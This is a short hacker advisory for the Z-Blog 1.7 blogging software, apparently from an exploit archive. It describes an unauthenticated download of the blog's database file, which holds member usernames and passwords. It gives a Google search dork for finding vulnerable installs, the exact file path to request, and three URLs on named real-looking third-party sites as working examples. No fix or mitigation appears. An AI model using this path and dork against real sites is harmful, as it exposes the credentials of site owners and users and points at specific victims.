- Author : Hasadya Raed
- Contact : [email protected] ~>Israel Hacker
- Greetz : Fairoz :)
- Advisory : Z-Blog 1.7 Authentication Bypass/Database Download Vulnerability
- Script : Z-Blog 1.7
- Impact : Remote
- Googledork : "Powered by Z-Blog 1.7" , "Powered By Z-Blog 1.7 Laputa Build 70216"
- Download : http://bbs.rainbowsoft.org/attachment.php?aid=92
–/ REPRODUCE \–
Attackers Can Authentication Bypass In This Product By Add The Following Files:
('/DATA/zblog.mdb') And Download The Database Which Contains Table Named [blog_Member]
The Users Names And Passwords Inside
–/ Examples \–
http://www.uistudio.cn/blog/DATA/zblog.mdb
http://www.kenyja.com/blog/DATA/zblog.mdb
http://www.netpub.cn/nffish/DATA/zblog.mdb